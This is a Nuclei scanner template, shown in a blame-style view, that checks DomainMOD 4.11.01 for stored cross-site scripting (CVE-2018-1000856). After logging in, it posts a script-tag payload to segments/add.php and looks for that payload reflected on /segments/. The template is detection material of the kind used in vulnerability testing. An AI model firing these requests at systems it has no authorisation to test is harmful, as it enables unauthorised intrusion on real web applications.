nuclei-templates/cves/2018/CVE-2018-1000856.yaml

60 lines
1.5 KiB
YAML
Raw Normal View History

2022-07-11 19:48:52 +00:00
id: CVE-2018-1000856
info:
2022-07-12 08:06:18 +00:00
name: DomainMOD 4.11.01 - Cross-Site Scripting
2022-07-11 19:48:52 +00:00
author: arafatansari
severity: medium
description: |
DomainMOD 4.11.01 is vulnerable to Cross Site Scripting (XSS) via segments/add.php Segment Name field.
reference:
- https://github.com/domainmod/domainmod/issues/80
2022-07-12 08:06:18 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-1000856
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
cvss-score: 4.8
cve-id: CVE-2018-1000856
cwe-id: CWE-79
2022-07-11 19:48:52 +00:00
metadata:
verified: "true"
2022-07-13 09:38:21 +00:00
tags: cve,cve2018,domainmod,xss,authenticated
2022-07-11 19:48:52 +00:00
requests:
- raw:
- |
2022-07-12 08:06:18 +00:00
POST / HTTP/1.1
2022-07-11 19:48:52 +00:00
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-12 08:06:18 +00:00
new_username={{username}}&new_password={{password}}
2022-07-11 19:48:52 +00:00
- |
2022-07-12 08:06:18 +00:00
POST /segments/add.php HTTP/1.1
Host: {{Hostname}}
2022-07-11 19:48:52 +00:00
Content-Type: application/x-www-form-urlencoded
2022-07-13 09:44:00 +00:00
new_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&raw_domain_list=test.com&new_description=test&new_notes=test
2022-07-11 19:48:52 +00:00
- |
2022-07-13 09:38:21 +00:00
GET /segments/ HTTP/1.1
2022-07-12 08:06:18 +00:00
Host: {{Hostname}}
2022-07-13 09:44:00 +00:00
Content-Type: application/x-www-form-urlencoded
2022-07-11 19:48:52 +00:00
2022-07-12 08:08:53 +00:00
cookie-reuse: true
2022-07-11 19:48:52 +00:00
redirects: true
2022-07-13 09:44:00 +00:00
max-redirects: 3
2022-07-12 08:06:18 +00:00
matchers-condition: and
2022-07-11 19:48:52 +00:00
matchers:
- type: word
part: body
words:
2022-07-13 09:44:00 +00:00
- "<script>alert(1)</script></a>"
2022-07-11 19:48:52 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200